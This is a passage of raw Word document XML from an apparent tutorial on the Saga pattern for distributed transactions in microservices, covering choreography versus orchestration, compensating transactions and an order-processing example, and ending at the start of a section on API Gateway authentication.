        <w:t>microservices architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, each service typically manages its own database, and services often need to work together to complete a business transaction. However, in such a distributed environment, maintaining </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ACID (Atomicity, Consistency, Isolation, Durability)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> properties across services is difficult due to the absence of a single, centralized database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18659AA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a solution to manage distributed transactions in microservices, ensuring that the system can remain in a consistent state even when failures occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEAB8F6"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4F5D">
          <v:rect id="_x0000_i2995" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C6630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at is the Saga Pattern?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD0C2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Saga Pattern divides a </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into a series of smaller, isolated transactions, each executed by a single service. These smaller transactions are called </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>saga steps</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aga operations</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and they are coordinated by a </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>saga orchestrator</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (centralized or decentralized). If a step in the saga fails, the pattern defines how compensating transactions (rollback) are performed to maintain data consistency and integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB812F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E4E05">
          <v:rect id="_x0000_i2996" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD980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Types of Saga Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7D304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3CB1424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 central coordinator</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each service knows about its responsibilities and when to execute a compensating transaction if something goes wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7748394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vent-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Services publish events that other services listen to, and they execute their tasks when the appropriate event occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CAB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In an order processing system, after a payment is completed, the payment service publishes an event (PaymentProcessed). The shipping service listens for this event and starts shipping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0512F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ion-Based Saga</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429538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entral coordinator (Saga Orchestrator)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A central service or a component directs the flow of the saga. It makes decisions on whether to proceed with the next step or trigger compensating actions if any step fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B108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plicit control</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The orchestrator decides the sequence of steps and handles the failure scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA8DC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A payment service will be called, followed by an inventory service, and then a shipment service. If the payment fails, the orchestrator triggers compensation for all previous steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C15854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3E83E">
          <v:rect id="_x0000_i2997" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A7817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he Saga Pattern Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151F59F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Initiating the Saga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECB7CD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request is received from a user (e.g., placing an order).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F807C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orchestrator (if orchestration-based) or the initiating service (in choreography-based) begins the distributed transaction by invoking the first service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F36F53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Executing the Saga Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6AA14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involved in the saga performs its part of the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B976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fter each step, the service either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61024EA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mits</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the transaction is successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309048F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lbacks</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or initiates a </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compensating transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the step fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4B0B16"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Compensating Transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF514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service fails at any point in the saga, the previously completed services must be compensated to revert the state to what it was before the saga started. These are called </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compensating actions</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240EEE0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example, if the payment service completes successfully but the shipping service fails, the compensating action would be to cancel the payment or refund the payment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCE119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615583">
          <v:rect id="_x0000_i2998" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B862E5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Orchestrator vs. Choreography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ACA0F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or-based Saga</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA6EF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single service (orchestrator) manages the execution of the entire saga, calls the steps in order, and invokes compensating transactions when needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41318E7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Centralized control over the process. Easier to implement and trace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25329F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The orchestrator can become a bottleneck, and the flow is tightly coupled to this central service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220E93A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2443DE3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communicate with each other through events, and each service knows when to act or compensate based on the state of the saga.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAFB3D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Decentralized, with no single point of failure, reducing bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21927E1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More complex event-driven communication, harder to manage and trace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFB38E8"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44E6">
          <v:rect id="_x0000_i2999" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC2D0E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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD4353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nsider an </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Order Management System</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the following microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0A1A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Handles order creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA98D6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Processes payment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA398B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Manages inventory stock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B258F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Manages shipping of the product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEE9E8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in a Saga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4548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1</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Create Order</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEC3F8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receives the order and creates an entry in its database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554ED4D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2</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Process Payment</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C484D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processes the payment. If payment fails, a compensating action (like cancelling the order) is triggered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCDD6E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3</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Reserve Inventory</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB988F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reserves the stock. If it fails, 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 (compensating action).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC88F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4</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Ship the Product</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7831245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The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initiates shipment. If it fails,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is notified to release the reserved stock, and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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104B64D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pensating Transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37673F5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at any step, the process fails (e.g., payment fails), the saga orchestrator or the services will initiate compensating actions like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF5431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anceling the order</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721BD7C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funding the payment</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31326C0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leasing the reserved inventory</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7667F8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ensures that the system does not end in an inconsistent state (e.g., inventory being reserved without payment or shipment without inventory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB069EC"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2223E">
          <v:rect id="_x0000_i3000" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC3DB4"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Using the Saga Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7337FA5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tributed Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458C58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es complex transactions across multiple services in a microservices architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3425CF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es Services</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29834B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only handles its own part of the business logic and compensating actions, improving service autonomy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF6598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 and Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D5932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agas allow services to scale independently without worrying about the global consistency across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797BAD8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Driven Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC731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pattern supports asynchronous communication, making it suitable for event-driven architectures that improve performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109793D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87393">
          <v:rect id="_x0000_i3001" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="220E92B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hallenges of Using the Saga Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241E5B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r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9612E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the saga pattern adds complexity to the system as services need to handle compensating actions, monitor saga status, and ensure data consistency across distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075EE9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2625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ing errors across multiple services can be tricky, especially in an asynchronous environment, making it difficult to maintain the transaction state and handle failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557381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4B3DDD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pattern relies on eventual consistency, which may not be suitable for systems requiring strong consistency or atomic operations across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5D069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racking State</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED18BE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69A15">
          <v:rect id="_x0000_i3002" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="431A303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o Implement Sagas?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB8C4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Event-Driven Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use event-based communication (via messaging queues like Kafka, RabbitMQ, etc.) between services to drive saga execution in a choreography-based approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7151EC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a Saga Orchestrator</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In orchestration-based sagas, design a centralized service that tracks the saga execution, manages state transitions, and invokes compensating transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE9726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aga State Management</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Maintain state to track the saga's progress and handle compensations for failed steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD7169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DCA4">
          <v:rect id="_x0000_i3003" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="328B51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25B860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essential for managing distributed transactions in a microservices environment, ensuring that the system remains consistent even when services fail. You can implement it using two approaches: </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Choreography</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (where services communicate via events) or </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Orchestration</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (where a central service coordinates the saga steps). While sagas add complexity, they offer a solution to maintain consistency in highly distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740AFF8C" w14:textId="05BF296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3004" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DBB028" w14:textId="094D0983" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00E06CFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="719" w:name="_Toc197867933"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to handle security in an API Gateway</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="719"/>
    </w:p>
    <w:p w14:paraId="17916865" w14:textId="6F144FED"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andling Security in an API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405EB9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acts as an entry point for all client requests in a microservices architecture. It provides features like load balancing, request routing, authentication, authorization, rate limiting, and more. When it comes to </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Here are the key ways to handle security in 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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BE87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F9D86">
          <v:rect id="_x0000_i3005" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2954D57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Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368E037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entication ensures that users or services are who they claim to be.</w:t>
      </w:r>
    </w:p>
